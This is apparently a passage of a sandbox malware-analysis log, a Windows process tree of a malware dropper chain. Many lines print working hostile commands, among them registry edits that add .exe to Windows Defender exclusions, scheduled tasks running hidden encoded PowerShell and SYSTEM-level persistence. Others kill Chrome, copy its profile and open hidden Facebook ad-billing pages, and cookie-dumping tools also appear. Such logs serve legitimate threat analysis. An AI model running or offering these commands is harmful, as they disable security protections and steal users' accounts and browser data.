"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:1
74⤵
PID:7400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
74⤵
PID:7976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
74⤵
PID:2692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
74⤵
PID:16204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
74⤵
PID:9936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4572 /prefetch:8
74⤵
PID:11144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kyvevbpw.hev\customer4.exe & exit
71⤵
PID:8528

C:\Users\Admin\AppData\Local\Temp\kyvevbpw.hev\customer4.exe
C:\Users\Admin\AppData\Local\Temp\kyvevbpw.hev\customer4.exe
72⤵
PID:10064

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
73⤵
PID:1240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jyatyege.jdd\HookSetp.exe & exit
71⤵
PID:13900

C:\Users\Admin\AppData\Local\Temp\jyatyege.jdd\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\jyatyege.jdd\HookSetp.exe
72⤵
PID:15840

C:\ProgramData\8050359.88
"C:\ProgramData\8050359.88"
73⤵
PID:9560

C:\ProgramData\6765460.74
"C:\ProgramData\6765460.74"
73⤵
- Suspicious behavior: SetClipboardViewer
PID:4132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5tnxge4x.wcu\GcleanerWW.exe /mixone & exit
71⤵
PID:17496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe & exit
71⤵
PID:15248

C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe
72⤵
- Suspicious use of SetThreadContext
PID:18044

C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe
73⤵
- Checks SCSI registry key(s)
PID:17916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11fit1uy.ys5\setup.exe /8-2222 & exit
71⤵
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yni13zkl.vb1\MultitimerFour.exe & exit
71⤵
PID:8572

C:\Users\Admin\AppData\Local\Temp\yni13zkl.vb1\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\yni13zkl.vb1\MultitimerFour.exe
72⤵
PID:15700

C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
73⤵
- Drops file in Windows directory
PID:2564

C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe" 1 3.1616085924.605383a473ca8 104
74⤵
- Adds Run key to start application
PID:14180

C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe" 2 3.1616085924.605383a473ca8
75⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:6344

C:\Users\Admin\AppData\Local\Temp\TKAOL330M7\setups.exe
"C:\Users\Admin\AppData\Local\Temp\TKAOL330M7\setups.exe" ll
73⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\is-2U3AL.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2U3AL.tmp\setups.tmp" /SL5="$3054C,549376,61440,C:\Users\Admin\AppData\Local\Temp\TKAOL330M7\setups.exe" ll
74⤵
- Checks computer location settings
PID:11916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0souxy3.lqz\setup.exe /S /kr /site_id=754 & exit
71⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\b0souxy3.lqz\setup.exe
C:\Users\Admin\AppData\Local\Temp\b0souxy3.lqz\setup.exe /S /kr /site_id=754
72⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:6580

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
73⤵
PID:9840

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
74⤵
PID:11048

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
75⤵
PID:16252

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
75⤵
PID:16196

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gjRzfjkPk" /SC once /ST 10:19:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
73⤵
- Creates scheduled task(s)
PID:5088

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gjRzfjkPk"
73⤵
PID:10704

C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\hjjgaa.exe" /Verysilent
65⤵
PID:17580

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
66⤵
PID:17736

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
66⤵
PID:12156

C:\Users\Admin\AppData\Local\Temp\bppy0xmihzj\31e5jfwbtzs.exe
"C:\Users\Admin\AppData\Local\Temp\bppy0xmihzj\31e5jfwbtzs.exe" /ustwo INSTALL
61⤵
PID:4336

C:\Users\Admin\AppData\Local\Temp\e4w4x1dx1ed\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\e4w4x1dx1ed\askinstall24.exe"
61⤵
- Drops Chrome extension
PID:16604

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
62⤵
PID:9628

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
63⤵
- Kills process with taskkill
PID:7588

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
62⤵
- Enumerates system info in registry
PID:15292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
62⤵
PID:11592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ffc43f36e00,0x7ffc43f36e10,0x7ffc43f36e20
63⤵
PID:11656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1500 /prefetch:2
63⤵
PID:10348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1780 /prefetch:8
63⤵
PID:12056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2180 /prefetch:8
63⤵
PID:12364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
63⤵
PID:14324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
63⤵
PID:16984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
63⤵
PID:5872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
63⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
63⤵
PID:6260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1
63⤵
PID:4956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4688 /prefetch:8
63⤵
PID:5684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=828 /prefetch:8
63⤵
PID:496

C:\Users\Admin\AppData\Local\Temp\CLXPLFDKOC\setups.exe
"C:\Users\Admin\AppData\Local\Temp\CLXPLFDKOC\setups.exe" ll
58⤵
PID:11876

C:\Users\Admin\AppData\Local\Temp\is-6ALDA.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6ALDA.tmp\setups.tmp" /SL5="$6059C,549376,61440,C:\Users\Admin\AppData\Local\Temp\CLXPLFDKOC\setups.exe" ll
59⤵
- Checks computer location settings
PID:11176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5mud3zxi.ler\setup.exe /S /kr /site_id=754 & exit
56⤵
PID:13264

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
57⤵
PID:14084

C:\Users\Admin\AppData\Local\Temp\5mud3zxi.ler\setup.exe
C:\Users\Admin\AppData\Local\Temp\5mud3zxi.ler\setup.exe /S /kr /site_id=754
57⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2672

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
58⤵
PID:14292

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
59⤵
PID:8952

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
60⤵
PID:14364

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
60⤵
PID:12296

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gueCPlTUO" /SC once /ST 06:55:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
58⤵
- Creates scheduled task(s)
PID:10272

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gueCPlTUO"
58⤵
PID:7192

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gueCPlTUO"
58⤵
PID:5004

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\OiRQGqF.exe\" nh /site_id 754 /S" /V1 /F
58⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:7840

C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\hjjgaa.exe" /Verysilent
50⤵
PID:4944

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
51⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
51⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\xcdmcwjiycl\rp03erkobpf.exe
"C:\Users\Admin\AppData\Local\Temp\xcdmcwjiycl\rp03erkobpf.exe" /ustwo INSTALL
46⤵
PID:7924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 648
47⤵
- Program crash
PID:14048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 660
47⤵
- Program crash
PID:15092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 664
47⤵
- Program crash
PID:2612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 808
47⤵
- Program crash
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 644
47⤵
- Program crash
PID:16120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 928
47⤵
- Program crash
PID:15468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 1084
47⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:16496

C:\Users\Admin\AppData\Local\Temp\udeiard2gmp\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\udeiard2gmp\AwesomePoolU1.exe"
46⤵
PID:12948

C:\Users\Admin\AppData\Local\Temp\z33sylcsphe\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\z33sylcsphe\askinstall24.exe"
46⤵
PID:8616

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
47⤵
PID:12836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
48⤵
- Kills process with taskkill
PID:11120

C:\Users\Admin\AppData\Local\Temp\AO5DHPW6T0\setups.exe
"C:\Users\Admin\AppData\Local\Temp\AO5DHPW6T0\setups.exe" ll
43⤵
PID:8704

C:\Users\Admin\AppData\Local\Temp\is-8VPMB.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8VPMB.tmp\setups.tmp" /SL5="$70502,549376,61440,C:\Users\Admin\AppData\Local\Temp\AO5DHPW6T0\setups.exe" ll
44⤵
- Checks computer location settings
PID:8792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\caglxgrt.jot\setup.exe /S /kr /site_id=754 & exit
41⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\caglxgrt.jot\setup.exe
C:\Users\Admin\AppData\Local\Temp\caglxgrt.jot\setup.exe /S /kr /site_id=754
42⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:7536

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
43⤵
PID:8176

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
44⤵
PID:10104

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
45⤵
PID:4772

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
45⤵
PID:9888

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOsoSHmLP" /SC once /ST 06:31:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
43⤵
- Creates scheduled task(s)
PID:10760

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOsoSHmLP"
43⤵
PID:11240

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gOsoSHmLP"
43⤵
PID:4228

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Ehlsplu.exe\" nh /site_id 754 /S" /V1 /F
43⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:14964

C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\hjjgaa.exe" /Verysilent
35⤵
PID:4604

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
36⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
36⤵
PID:8248

C:\Users\Admin\AppData\Local\Temp\5f3t1uh14q5\ugk5iqmtyu1.exe
"C:\Users\Admin\AppData\Local\Temp\5f3t1uh14q5\ugk5iqmtyu1.exe" /ustwo INSTALL
31⤵
PID:10472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 648
32⤵
- Program crash
PID:12960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 684
32⤵
- Program crash
PID:12220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 764
32⤵
- Program crash
PID:12532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 812
32⤵
- Program crash
PID:12824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 880
32⤵
- Program crash
PID:10660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 928
32⤵
- Program crash
PID:14740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 1092
32⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:14504

C:\Users\Admin\AppData\Local\Temp\3fzaobzkxcl\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\3fzaobzkxcl\askinstall24.exe"
31⤵
PID:10488

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
32⤵
PID:11172

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
33⤵
- Kills process with taskkill
PID:11396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbu3sgke.555\setup.exe /S /kr /site_id=754 & exit
26⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\qbu3sgke.555\setup.exe
C:\Users\Admin\AppData\Local\Temp\qbu3sgke.555\setup.exe /S /kr /site_id=754
27⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:5464

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
28⤵
PID:16772

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
29⤵
PID:6688

